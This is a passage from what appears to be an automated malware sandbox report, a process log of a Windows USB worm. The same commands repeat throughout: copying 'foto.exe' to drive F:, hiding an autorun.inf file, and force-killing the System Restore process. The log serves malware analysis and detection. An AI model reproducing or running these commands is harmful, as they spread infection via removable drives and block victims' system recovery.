    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3020
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2940
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2828
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2920
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2232
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2176
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2960
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2900
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2644
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2152
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2656
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2264
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2248
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2916
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1028
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2864
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2872
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2228
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2600
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:2700
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2880
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:2984
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2992
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1228
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2124
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:1440
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:1372
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2368
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1244
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1980
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:868
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1568
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1148
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1452
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1576
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2060
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2052
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1948
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2140
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:876
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1376
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2844
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1632
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1484
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:600
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2220
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1016
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:560
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1828
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2092
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1340
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:908
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1116
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:1876
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:3032
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:408
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2292
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1488
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    - Drops autorun.inf file
    PID:988
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2584
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1312
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1912
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1812
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:588
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1392
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1804
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1556
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1060
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1180
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1088
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:900
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2044
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:928
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3008
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:2256
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2036
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2512
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2096
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1396
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1732
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2164
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:640
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2420
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1196
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:892
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:316
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1192
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2204
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:632
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2392
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1608
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2932
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1696
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2532
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2376
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2032
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1720
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2760
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2764
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2812
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2768
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2772
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2740
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2912
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1972
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1612
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2908
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3016
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2796
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2968
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2948
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1860
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2652
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2168
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2160
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2296
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:984
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:800
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2988
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2308
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3000
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:2708
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2868
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2856
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2716
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2956
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2976
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1356
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2680
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:2852
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2712
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2832
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2672
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:472
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1008
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1616
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1152
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1560
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1760
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1916
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2944
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2064
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:452
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:488
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1208
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1648
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:584
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2024
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:108
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1528
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1104
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1524
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2200
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1340
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1900
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2360
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2800
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:3040
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:448
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1752
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:1964
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1620
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2020
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:960
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:612
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2416
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2456
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1884
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2012
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1688
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2084
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1180
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1088
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2100
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:844
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1144
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1780
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:712
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1864
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2080
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2524
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1744
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:1492
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1672
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2316
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1920
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2540
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:620
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:912
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2212
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:768
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1940
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1932
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2156
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:1596
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2216
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1608
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2932
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1696
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2552
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2376
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2032
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1720
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2724
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2764
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2812
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2768
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2888
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2740
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2912
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1972
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2732
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1052
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:3016
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2796
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2640
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2948
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:1860
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2652
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1300
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2160
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2296
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:984
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2444
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2988
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2308
- - C:\Windows\SysWOW64\taskkill.exe
